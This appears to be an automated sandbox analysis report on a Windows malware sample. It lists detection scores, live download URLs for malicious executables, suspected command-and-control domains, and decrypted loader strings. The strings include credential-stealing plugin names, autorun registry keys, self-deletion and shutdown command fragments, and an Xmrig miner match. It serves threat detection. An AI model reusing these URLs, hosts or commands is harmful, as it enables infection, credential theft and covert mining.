Source: http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr6	Virustotal: Detection: 22%	Perma Link
Source: https://quialitsuzoxm.shop/api	Virustotal: Detection: 13%	Perma Link
Source: http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr#	Virustotal: Detection: 22%	Perma Link
Source: https://languagedscie.shop/api	Virustotal: Detection: 12%	Perma Link
Source: https://celebratioopz.shop/api	Virustotal: Detection: 14%	Perma Link
Source: http://147.45.44.104/prog/66b5ac1092454_otraba.exe#otrb24859611ad_agent_3.exe	Virustotal: Detection: 22%	Perma Link
Source: http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr	Virustotal: Detection: 22%	Perma Link
Source: https://mennyudosirso.shop/api	Virustotal: Detection: 14%	Perma Link
Source: https://steamcommunity.com/profiles/76561199724331900	Virustotal: Detection: 8%	Perma Link
Source: http://147.45.44.104/prog/66b5b75106ac6_stealc.exe#spaceet	Virustotal: Detection: 23%	Perma Link
Source: http://194.58.114.223/d/525403	Virustotal: Detection: 12%	Perma Link
Source: https://helleaa.com/temp/random.exe	Virustotal: Detection: 8%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\NetVoyager\nv.exe	ReversingLabs: Detection: 83%
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66ae9cc050ded_file0308[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66b623c3b1dcb_Mowdiewart[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\armadegon[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66b24859611ad_agent_3[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5b75106ac6_stealc[1].exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5d9d3adbaa_defaultr[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b45c742e0a1_123p[1].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b5ac1092454_otraba[1].exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	ReversingLabs: Detection: 68%
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66b24859611ad_agent_3[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\armadegon[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66b623c3b1dcb_Mowdiewart[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66ae9cc050ded_file0308[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: quialitsuzoxm.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: complaintsipzzx.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: languagedscie.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: mennyudosirso.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: bassizcellskz.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: deallerospfosu.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: writerospzm.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: celebratioopz.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: enfixxysdjsip.shop
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000E.00000002.2208012146.0000000003F11000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rCBtum--otraba
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: api.garageserviceoperation.com
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: /CoreOPT/index.php
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: S-%lu-
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: 69c36458f5
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ednfosi.exe
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Startup
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: rundll32
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Programs
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: %USERPROFILE%
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: cred.dll
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: clip.dll
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: http://
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: https://
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: /quiet
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: /Plugins/
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: &unit=
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: shell32.dll
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: kernel32.dll
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: GetNativeSystemInfo
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ProgramData\
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: AVAST Software
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Kaspersky Lab
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Panda Security
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Doctor Web
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: 360TotalSecurity
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Bitdefender
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Norton
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Sophos
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Comodo
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: WinDefender
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: 0123456789
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ------
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ?scr=1
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ComputerName
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: -unicode-
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: VideoID
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: DefaultSettings.XResolution
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: DefaultSettings.YResolution
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ProductName
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: CurrentBuild
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: rundll32.exe
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: "taskkill /f /im "
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: " && timeout 1 && del
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: && Exit"
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: " && ren
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Powershell.exe
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: shutdown -s -t 0
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: random
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: o]VAl4
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: api.garageserviceoperation.com
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: /CoreOPT/index.php
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: S-%lu-
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: 69c36458f5
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ednfosi.exe
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Startup
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: rundll32
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Programs
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: %USERPROFILE%
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: cred.dll
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: clip.dll
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: http://
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: https://
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: /quiet
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: /Plugins/
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: &unit=
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: shell32.dll
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: kernel32.dll
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: GetNativeSystemInfo
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ProgramData\
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: AVAST Software
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Kaspersky Lab
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Panda Security
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Doctor Web
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: 360TotalSecurity
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Bitdefender
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Norton
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Sophos
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Comodo
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: WinDefender
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: 0123456789
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ------
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ?scr=1
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ComputerName
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: -unicode-
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: VideoID
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: DefaultSettings.XResolution
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: DefaultSettings.YResolution
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: ProductName
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: CurrentBuild
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: rundll32.exe
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: "taskkill /f /im "
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: " && timeout 1 && del
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: && Exit"
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: " && ren
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: Powershell.exe
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: shutdown -s -t 0
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: random
Source: 9.2.eROo1ugNChgONSxoiS6DxyMi.exe.361eea2.0.raw.unpack	String decryptor: o]VAl4

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 46.3.etzpikspwykg.exe.9f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.3.etzpikspwykg.exe.9f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

Source: unknown	HTTPS traffic detected: 104.26.8.59:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.209.124:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.240.132.78:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.141:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.47.141:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.69.39:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.43:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.239.218:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.14.101:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.210.117.250:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49830 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: NjdbLPleIutA8FKI_S3fRztd.exe, NjdbLPleIutA8FKI_S3fRztd.exe, 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: PE.pdbH] source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2181342436.00000000036B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sQGaH.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2458695015.00000000091B6000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
